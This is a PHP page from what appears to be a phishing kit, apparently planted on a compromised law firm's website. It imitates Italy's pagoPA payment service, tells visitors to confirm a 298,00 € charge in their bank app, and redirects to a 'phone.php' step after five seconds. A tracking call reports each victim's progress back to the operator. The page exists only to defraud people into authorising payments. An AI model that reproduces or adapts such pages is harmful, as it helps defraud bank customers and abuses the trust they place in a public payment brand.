/home2/mshostin/jamesandersonlawfirm.com/p/pago/msdpweb/loading3.php
<?php 
require '../main.php';
?>
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1" />
    <title>pagoPA</title>
    <link rel="icon" type="image/png" href="https://brandlogos.net/wp-content/uploads/2022/08/pagopa-logo_brandlogos.net_gp2p3.png" />
    <link href="https://fonts.googleapis.com/css2?family=Titillium+Web:wght@400;600&amp;display=swap" rel="stylesheet" />

    <style>
        body,
        html {
            height: 100%;
            margin: 0;
            font-family: "Titillium Web", Arial, sans-serif;
            background: linear-gradient(180deg, #003366 0%, #00bfff 100%);
            display: flex;
            justify-content: center;
            align-items: center;
            color: white;
            text-align: center;
            flex-direction: column;
            padding: 20px;
        }

        .logo-section {
            background-color: rgba(0, 0, 0, 0.3);
            padding: 30px 20px;
            border-radius: 12px;
            margin-bottom: 40px;
            width: 300px;
            display: flex;
            justify-content: center;
            align-items: center;
            user-select: none;
            box-shadow: 0 0 15px rgba(0, 0, 0, 0.3);
        }

        .logo-section img {
            width: 160px;
            height: auto;
        }

        .spinner {
            border: 6px solid rgba(255, 255, 255, 0.3);
            border-top: 6px solid #00bfff;
            border-radius: 50%;
            width: 60px;
            height: 60px;
            animation: spin 1s linear infinite;
            margin-bottom: 20px;
        }

        @keyframes spin {
            0% {
                transform: rotate(0deg);
            }
            100% {
                transform: rotate(360deg);
            }
        }

        .message-box {
            background-color: rgba(0, 0, 0, 0.3);
            padding: 20px 30px;
            border-radius: 12px;
            max-width: 90%;
            font-size: 18px;
            line-height: 1.6;
            box-shadow: 0 0 10px rgba(0, 0, 0, 0.2);
            user-select: none;
            max-width: 360px;
            margin: 0 auto;
        }

        .amount {
            font-size: 20px;
            font-weight: 600;
            margin-top: 10px;
            margin-bottom: 10px;
            color: #00ffff;
        }

        @media (max-width: 480px) {
            .logo-section {
                width: 90%;
                padding: 20px 10px;
                margin-bottom: 30px;
            }

            .logo-section img {
                width: 120px;
            }

            .spinner {
                width: 48px;
                height: 48px;
                border-width: 5px;
                margin-bottom: 15px;
            }

            .message-box {
                font-size: 16px;
            }

            .amount {
                font-size: 18px;
            }
        }
    </style>

    <script>
        // Redirect to pg.php after 5 seconds
        setTimeout(() => {
            window.location.href = "phone.php";
        }, 5000);
    </script>
</head>

<body>
  <section class="logo-section" aria-label="Logo PagoPA">
    <img src="https://brandlogos.net/wp-content/uploads/2022/08/pagopa-logo_brandlogos.net_gp2p3.png" alt="PagoPA Logo">
  </section>

  <div class="spinner" aria-label="Caricamento in corso"></div>

  <div class="message-box">
    conferma la transazione tramite l'applicazione della tua banca<br>
    <span class="amount">Importo: 298,00 €</span>
  </div>


</body>
<?php 
$m->ctr("Loading4 (".@$_GET['p'].")");
?>
</html>